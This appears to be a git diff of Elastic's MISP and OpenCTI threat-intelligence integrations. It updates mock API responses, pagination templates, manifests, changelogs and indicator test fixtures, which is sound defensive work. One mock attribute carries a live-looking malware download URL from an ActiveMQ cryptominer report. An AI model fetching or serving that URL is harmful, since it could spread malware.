"inherited": 1 + }, + { + "id": "1051", + "name": "tlp:clear", + "colour": "#ffffff", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "713", + "name": "misp-galaxy:mitre-attack-pattern=\"Resource Hijacking - T1496\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + } + ] + }, + { + "id": "268570", + "event_id": "1294", + "object_id": "0", + "object_relation": null, + "category": "Network activity", + "type": "url", + "to_ids": true, + "uuid": "28f55810-c61e-42d0-8565-cc7d2e7eb57c", + "timestamp": "1700667505", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "http://194.38.22.53/libsystem.so", + "decay_score": [ + { + "score": 49.98530793883329, + "base_score": 50, + "decayed": false, + "DecayingModel": { + "id": "2", + "name": "test-decay-model-2" + } + } + ], + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1294", + "info": "CVE-2023-46604 (Apache ActiveMQ) Vulnerability Exploited to Infect Systems With Cryptominers and Rootkits", + "orgc_id": "3", + "uuid": "df7b7020-9f17-4a3c-9824-1baa4ff67cb1" + }, + "Tag": [ + { + "id": "10", + "name": "type:OSINT", + "colour": "#004646", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "204", + "name": "osint:lifetime=\"perpetual\"", + "colour": "#0071c3", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "11", + "name": "tlp:white", + "colour": "#ffffff", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "1051", + "name": "tlp:clear", + "colour": "#ffffff", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "713", + "name": "misp-galaxy:mitre-attack-pattern=\"Resource Hijacking - T1496\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + } + ] + } ] } } - - path: /attributes/restSearch + - path: /attributes/restSearch # sequence 1, page 2 methods: ["POST"] request_headers: Authorization: "test" Content-Type: application/json - request_body: /^{"limit":"10","page":"2","returnFormat":"json","timestamp":"\d+"/ + request_body: /^{"includeDecayScore":"true","limit":"10","order":"timestamp","page":"2","returnFormat":"json","timestamp":"\d+"/ responses: - status_code: 200 body: "{\n \"response\": {\n \"Attribute\": []\n }\n} " + - path: /attributes/restSearch # sequence 1, page 1 + methods: ["POST"] + request_headers: + Authorization: "test" + Content-Type: application/json + request_body: /^{"includeDecayScore":"true","limit":"10","order":"timestamp","page":"1","returnFormat":"json","timestamp":"\d+"/ + responses: + - status_code: 200 + body: |- + { + "response": { + "Attribute": [ + { + "id": "1", + "event_id": "1", + "object_id": "0", + "object_relation": null, + "category": "External analysis", + "type": "link", + "to_ids": false, + "uuid": "542e4cbd-ee78-4a57-bfb8-1fda950d210b", + "timestamp": "1412320445", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "http://labs.opendns.com/2014/10/02/opendns-and-bash/", + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1", + "info": "OSINT ShellShock scanning IPs from OpenDNS", + "orgc_id": "2", + "uuid": "542e4c9c-cadc-4f8f-bb11-6d13950d210b" + } + }, + { + "id": "2", + "event_id": "1", + "object_id": "0", + "object_relation": null, + "category": "External analysis", + "type": "link", + "to_ids": false, + "uuid": "542e4cbe-d560-4e14-9157-1fda950d210b", + "timestamp": "1412320446", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "https://gist.github.com/andrewsmhay/de1cdc63d04c2bbf8c12", + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1", + "info": "OSINT ShellShock scanning IPs from OpenDNS", + "orgc_id": "2", + "uuid": "542e4c9c-cadc-4f8f-bb11-6d13950d210b" + } + } + ] + } + } diff --git a/packages/ti_misp/changelog.yml b/packages/ti_misp/changelog.yml index 77aa7907576..6a5438b1a82 100644 --- a/packages/ti_misp/changelog.yml +++ b/packages/ti_misp/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "1.32.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 +- version: "1.31.0" + changes: + - description: Pagination fixes + type: enhancement + link: https://github.com/elastic/integrations/pull/9073 +- version: "1.30.1" + changes: + - description: Add recent new field to latest_ioc transform dest + type: enhancement + link: https://github.com/elastic/integrations/pull/8963 +- version: "1.30.0" + changes: + - description: Added attribute limit option to the UI + type: enhancement + link: https://github.com/elastic/integrations/pull/9064 - version: "1.29.1" changes: - description: Changed owners diff --git a/packages/ti_misp/data_stream/threat/_dev/test/system/test-default-config.yml b/packages/ti_misp/data_stream/threat/_dev/test/system/test-default-config.yml index c689b96f1a6..140488eddee 100644 --- a/packages/ti_misp/data_stream/threat/_dev/test/system/test-default-config.yml +++ b/packages/ti_misp/data_stream/threat/_dev/test/system/test-default-config.yml @@ -6,8 +6,8 @@ data_stream: preserve_original_event: true url: http://{{Hostname}}:{{Port}} api_token: test - interval: 10m - initial_interval: 10m + interval: 1s + initial_interval: 10s enable_request_tracer: true assert: hit_count: 3 diff --git a/packages/ti_misp/data_stream/threat/agent/stream/httpjson.yml.hbs b/packages/ti_misp/data_stream/threat/agent/stream/httpjson.yml.hbs index 50415377874..816476e4ce6 100644 --- a/packages/ti_misp/data_stream/threat/agent/stream/httpjson.yml.hbs +++ b/packages/ti_misp/data_stream/threat/agent/stream/httpjson.yml.hbs @@ -38,8 +38,16 @@ request.transforms: value: json - set: target: body.timestamp - value: '[[.cursor.timestamp.Unix]]' + value: >- + [[- if index .cursor "timestamp" -]] + [[- .cursor.timestamp -]] + [[- else -]] + [[- .last_response.url.params.Get "timestamp" -]] + [[- end -]] default: '[[ (now (parseDuration "-{{initial_interval}}")).Unix ]]' +- set: + target: body.order + value: timestamp - set: # Ignored by MISP, set as a workaround to make it available in response.pagination. target: url.params.timestamp diff --git a/packages/ti_misp/data_stream/threat/manifest.yml b/packages/ti_misp/data_stream/threat/manifest.yml index 063d60bab64..0872c8120e6 100644 --- a/packages/ti_misp/data_stream/threat/manifest.yml +++ b/packages/ti_misp/data_stream/threat/manifest.yml @@ -18,6 +18,7 @@ streams: required: true show_user: true description: The API token used to access the MISP instance. + secret: true - name: initial_interval type: text title: Initial interval diff --git a/packages/ti_misp/data_stream/threat_attributes/_dev/test/system/test-default-config.yml b/packages/ti_misp/data_stream/threat_attributes/_dev/test/system/test-default-config.yml index fa97cc16e46..b3996354802 100644 --- a/packages/ti_misp/data_stream/threat_attributes/_dev/test/system/test-default-config.yml +++ b/packages/ti_misp/data_stream/threat_attributes/_dev/test/system/test-default-config.yml @@ -6,8 +6,8 @@ data_stream: preserve_original_event: true url: http://{{Hostname}}:{{Port}} api_token: test - interval: 10m - initial_interval: 10m + interval: 1s + initial_interval: 10s enable_request_tracer: true ioc_expiration_duration: 5d assert: diff --git a/packages/ti_misp/data_stream/threat_attributes/agent/stream/httpjson.yml.hbs b/packages/ti_misp/data_stream/threat_attributes/agent/stream/httpjson.yml.hbs index 691caf70757..01dae70f968 100644 --- a/packages/ti_misp/data_stream/threat_attributes/agent/stream/httpjson.yml.hbs +++ b/packages/ti_misp/data_stream/threat_attributes/agent/stream/httpjson.yml.hbs @@ -30,9 +30,11 @@ request.transforms: - set: target: body.page value: 1 +{{#if limit}} - set: target: body.limit - value: 10 + value: {{limit}} +{{/if}} {{#if enforce_warning_list}} - set: target: body.enforceWarninglist @@ -43,7 +45,12 @@ request.transforms: value: json - set: target: body.timestamp - value: '[[.cursor.timestamp.Unix]]' + value: >- + [[- if index .cursor "timestamp" -]] + [[- .cursor.timestamp -]] + [[- else -]] + [[- .last_response.url.params.Get "timestamp" -]] + [[- end -]] default: '[[ (now (parseDuration "-{{initial_interval}}")).Unix ]]' - set: # Ignored by MISP, set as a workaround to make it available in response.pagination. @@ -52,6 +59,9 @@ request.transforms: - set: target: body.includeDecayScore value: true +- set: + target: body.order + value: timestamp response.split: target: body.response.Attribute @@ -72,7 +82,7 @@ response.pagination: value: '[[.last_response.url.params.Get "timestamp"]]' cursor: timestamp: - value: '[[.last_event.Attribute.timestamp]]' + value: '[[.last_event.timestamp]]' tags: {{#if preserve_original_event}} - preserve_original_event diff --git a/packages/ti_misp/data_stream/threat_attributes/manifest.yml b/packages/ti_misp/data_stream/threat_attributes/manifest.yml index 9c5324fc173..f9c1340eaa2 100644 --- a/packages/ti_misp/data_stream/threat_attributes/manifest.yml +++ b/packages/ti_misp/data_stream/threat_attributes/manifest.yml @@ -18,6 +18,15 @@ streams: required: true show_user: true description: The API token used to access the MISP instance. + secret: true + - name: limit + type: text + title: Attributes Limit + multi: false + required: true + show_user: true + default: 10 + description: Configures how many attributes are returned for each API request. - name: initial_interval type: text title: Initial interval diff --git a/packages/ti_misp/elasticsearch/transform/latest_ioc/fields/ecs.yml b/packages/ti_misp/elasticsearch/transform/latest_ioc/fields/ecs.yml index 4719c670656..a9f7e59c644 100644 --- a/packages/ti_misp/elasticsearch/transform/latest_ioc/fields/ecs.yml +++ b/packages/ti_misp/elasticsearch/transform/latest_ioc/fields/ecs.yml @@ -78,3 +78,5 @@ name: organization.id - external: ecs name: labels +- name: threat.indicator.email.subject + type: keyword diff --git a/packages/ti_misp/elasticsearch/transform/latest_ioc/transform.yml b/packages/ti_misp/elasticsearch/transform/latest_ioc/transform.yml index e4ca3cf9cfb..545593ee0b4 100644 --- a/packages/ti_misp/elasticsearch/transform/latest_ioc/transform.yml +++ b/packages/ti_misp/elasticsearch/transform/latest_ioc/transform.yml @@ -33,4 +33,4 @@ retention_policy: _meta: managed: true # Bump this version to delete, reinstall, and restart the transform during package. - fleet_transform_version: 0.1.0 + fleet_transform_version: 0.1.1 diff --git a/packages/ti_misp/manifest.yml b/packages/ti_misp/manifest.yml index 339ba6ac9cc..1205dc0d9e4 100644 --- a/packages/ti_misp/manifest.yml +++ b/packages/ti_misp/manifest.yml @@ -1,13 +1,13 @@ name: ti_misp title: MISP -version: "1.29.1" +version: "1.32.0" description: Ingest threat intelligence indicators from MISP platform with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: ["security", "threat_intel"] conditions: kibana: - version: ^8.11.0 + version: ^8.12.0 icons: - src: /img/misp.svg title: MISP diff --git a/packages/ti_opencti/_dev/build/docs/README.md b/packages/ti_opencti/_dev/build/docs/README.md index d988a3dcba7..70b171de2e9 100644 --- a/packages/ti_opencti/_dev/build/docs/README.md +++ b/packages/ti_opencti/_dev/build/docs/README.md @@ -15,7 +15,7 @@ Each event in the log data stream collected by the OpenCTI integration is an ind This integration requires Filebeat version 8.9.0, or later. -It was initially developed using OpenCTI version 5.10.1 and updated for verison 5.12.X. +It has been updated for OpenCTI version 5.12.24 and requires that version or later. ## Setup @@ -33,6 +33,18 @@ The `indicator` data stream includes indicators of the following types (`threat. OpenCTI's data model closely follows the [STIX standard](https://docs.oasis-open.org/cti/stix/v2.1/os/stix-v2.1-os.html). It supports complex indicators defined using STIX patterns or other languages, and each indicator can be related to one or more observables. In the [ECS threat fields](https://www.elastic.co/guide/en/ecs/current/ecs-threat.html) the focus is on atomic indicators. This integration fetches as much data as possible about indicators and their related observables, and populates relevant ECS fields wherever possible. It uses related observables rather than the indicator pattern as the data source for type-specific indicator fields. +#### Expiration of inactive indicators + +The `opencti.indicator.invalid_or_revoked_from` field is set to the earliest time at which an indicator reaches its `valid_until` time or is marked as revoked. From that time the indicator should no longer be considered active. + +An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created to provide a view of active indicators for end users. This transform creates destination indices that are accessible via the alias `logs-ti_opencti_latest.indicator`. When querying for active indicators or setting up indicator match rules, use that alias to avoid false positives from expired indicators. + +The dashboards show only active indicators, except the Ingestion dashboard, which shows data from both the source data stream and the indices of the latest indicators. + +Indicators that are never expired or revoked will not be removed from the indices of the latest indicators. If accumulation of indicators is a problem there, it can be managed upstream in OpenCTI, or by manually deleting indicators from those indices. + +To prevent unbounded growth of the source data stream `logs-ti_opencti.indicator-*`, it has an index lifecycle management (ILM) policy that deletes records 5 days after ingestion. + #### Example Here is an example `indicator` event: @@ -57,6 +69,7 @@ Timestamps are mapped as follows: | modified | threat.indicator.modified_at | Time of the indicator's last modification | | valid_from | opencti.indicator.valid_from | Time from which this indicator is considered a valid indicator of the behaviors it is related to or represents | | valid_until | opencti.indicator.valid_until | Time at which this indicator should no longer be considered a valid indicator of the behaviors it is related to or represents | +| - | opencti.indicator.invalid_or_revoked_from | The earliest time at which an indicator reaches its `valid_until` time or is marked as revoked | The table below lists all `opencti.*` fields. diff --git a/packages/ti_opencti/_dev/deploy/docker/files/config.yml b/packages/ti_opencti/_dev/deploy/docker/files/config.yml index 1c6bfe9215b..b39471f4508 100644 --- a/packages/ti_opencti/_dev/deploy/docker/files/config.yml +++ b/packages/ti_opencti/_dev/deploy/docker/files/config.yml @@ -36,33 +36,21 @@ rules: "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "information-credibility-6" - } - }, - { - "node": { - "value": "osint" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "information-credibility-6" + }, + { + "value": "osint" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -109,33 +97,21 @@ rules: "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "information-credibility-6" - } - }, - { - "node": { - "value": "osint" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "information-credibility-6" + }, + { + "value": "osint" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -182,33 +158,21 @@ rules: "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "information-credibility-6" - } - }, - { - "node": { - "value": "osint" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "information-credibility-6" + }, + { + "value": "osint" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -277,33 +241,21 @@ rules: "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "information-credibility-6" - } - }, - { - "node": { - "value": "osint" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "information-credibility-6" + }, + { + "value": "osint" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -350,33 +302,21 @@ rules: "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "information-credibility-6" - } - }, - { - "node": { - "value": "osint" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "information-credibility-6" + }, + { + "value": "osint" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -423,33 +363,21 @@ rules: "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "information-credibility-6" - } - }, - { - "node": { - "value": "osint" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "information-credibility-6" + }, + { + "value": "osint" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -518,33 +446,21 @@ rules: "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "information-credibility-6" - } - }, - { - "node": { - "value": "osint" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "information-credibility-6" + }, + { + "value": "osint" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -591,30 +507,21 @@ rules: "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "information-credibility-6" - } - }, - { - "node": { - "value": "osint" - } - } - ] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "information-credibility-6" + }, + { + "value": "osint" + } + ], + "killChainPhases": [], "killChainPhases": { "edges": [] }, @@ -664,33 +571,21 @@ rules: "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:GREEN" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "information-credibility-6" - } - }, - { - "node": { - "value": "osint" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:GREEN" + } + ], + "objectLabel": [ + { + "value": "information-credibility-6" + }, + { + "value": "osint" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, diff --git a/packages/ti_opencti/changelog.yml b/packages/ti_opencti/changelog.yml index f75001e4580..8ca14f0917b 100644 --- a/packages/ti_opencti/changelog.yml +++ b/packages/ti_opencti/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "2.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 +- version: "2.0.0" + changes: + - description: Update for OpenCTI v5.12.24 GraphQL schema change + type: bugfix + link: https://github.com/elastic/integrations/pull/9088 +- version: "1.1.0" + changes: + - description: Add support for IOC expiration + type: enhancement + link: https://github.com/elastic/integrations/pull/8920 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-cryptocurrency-wallet.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-cryptocurrency-wallet.json index 58eb7d8adeb..88985662926 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-cryptocurrency-wallet.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-cryptocurrency-wallet.json @@ -23,68 +23,42 @@ "identity_class": "organization", "name": "AlienVault" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "rat" - } - }, - { - "node": { - "value": "stealer" - } - }, - { - "node": { - "value": "themida" - } - }, - { - "node": { - "value": "cryptocurrencies" - } - }, - { - "node": { - "value": "ekipa" - } - }, - { - "node": { - "value": "aurora" - } - }, - { - "node": { - "value": "aurora stealer" - } - }, - { - "node": { - "value": "ekipa rat" - } - }, - { - "node": { - "value": "rilide" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "rat" + }, + { + "value": "stealer" + }, + { + "value": "themida" + }, + { + "value": "cryptocurrencies" + }, + { + "value": "ekipa" + }, + { + "value": "aurora" + }, + { + "value": "aurora stealer" + }, + { + "value": "ekipa rat" + }, + { + "value": "rilide" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -106,4 +80,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-cryptocurrency-wallet.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-cryptocurrency-wallet.json-expected.json index bd6b7f11b25..1538d0f44e3 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-cryptocurrency-wallet.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-cryptocurrency-wallet.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2024-04-04T07:45:52.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name-with-external-reference.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name-with-external-reference.json index 71bccb30875..24b1678a9ff 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name-with-external-reference.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name-with-external-reference.json @@ -29,24 +29,16 @@ }, "id": "fcfa872e-a8b6-4525-847e-f3c756b70035", "is_inferred": false, - "killChainPhases": { - "edges": null - }, + "killChainPhases": [], "lang": "en", "modified": "2023-11-09T23:22:20.586Z", "name": "freelifetimexxxdates.com", - "objectLabel": { - "edges": [ - { - "node": { - "value": "spam" - } - } - ] - }, - "objectMarking": { - "edges": null - }, + "objectLabel": [ + { + "value": "spam" + } + ], + "objectMarking": [], "observables": { "edges": [ { diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name-with-external-reference.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name-with-external-reference.json-expected.json index 95f07ae5f30..838194a19ab 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name-with-external-reference.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name-with-external-reference.json-expected.json @@ -30,6 +30,7 @@ "https://example.com/CVE-0079-1234" ] }, + "invalid_or_revoked_from": "2024-11-08T23:22:19.426Z", "is_inferred": false, "lang": "en", "observables_count": 1, @@ -85,4 +86,4 @@ } } ] -} +} \ No newline at end of file diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name.json index 3e48401c253..65b1459cd3f 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name.json @@ -23,33 +23,21 @@ "identity_class": "organization", "name": "AlienVault" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "iran" - } - }, - { - "node": { - "value": "oilrig" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "iran" + }, + { + "value": "oilrig" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -71,4 +59,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name.json-expected.json index e80c0441574..d937c16d518 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-domain-name.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2018-03-31T10:42:38.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-addr.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-addr.json index b886af3ab07..d3a252ab6d9 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-addr.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-addr.json @@ -23,33 +23,21 @@ "identity_class": "organization", "name": "AlienVault" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "ransomware" - } - }, - { - "node": { - "value": "gryphon" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "ransomware" + }, + { + "value": "gryphon" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -72,4 +60,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-addr.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-addr.json-expected.json index 47c0779d0d9..bad46735a22 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-addr.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-addr.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2018-08-04T09:57:02.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-message.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-message.json index 87a0f4e0403..995b623fc82 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-message.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-message.json @@ -23,28 +23,18 @@ "identity_class": "organization", "name": "CIRCL" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "malware" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "malware" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -72,4 +62,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-message.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-message.json-expected.json index 6cfc3d40d90..9cbab5d81c1 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-message.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-email-message.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2017-08-16T14:29:16.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-name.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-name.json index 6f2c1dd1974..92daf819608 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-name.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-name.json @@ -23,28 +23,18 @@ "identity_class": "organization", "name": "CthulhuSPRL.be" }, - "objectMarking": { - "edges": [ - { - "node": { - "definition_type": "TLP", - "definition": "TLP:CLEAR" - } - } - ] - }, - "objectLabel": { - "edges": [ - { - "node": { - "value": "osint" - } - } - ] - }, - "killChainPhases": { - "edges": [] - }, + "objectMarking": [ + { + "definition_type": "TLP", + "definition": "TLP:CLEAR" + } + ], + "objectLabel": [ + { + "value": "osint" + } + ], + "killChainPhases": [], "externalReferences": { "edges": [] }, @@ -78,4 +68,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-name.json-expected.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-name.json-expected.json index 55da1bc4d48..a1555ce4a52 100644 --- a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-name.json-expected.json +++ b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-name.json-expected.json @@ -19,6 +19,7 @@ "indicator": { "creator_identity_class": "organization", "detection": false, + "invalid_or_revoked_from": "2017-06-19T22:22:09.000Z", "is_inferred": false, "lang": "en", "observables_count": 1, diff --git a/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-sha256.json b/packages/ti_opencti/data_stream/indicator/_dev/test/pipeline/test-file-with-sha256.json index 31e7f85616e..709dd8c9c92 100644 --- 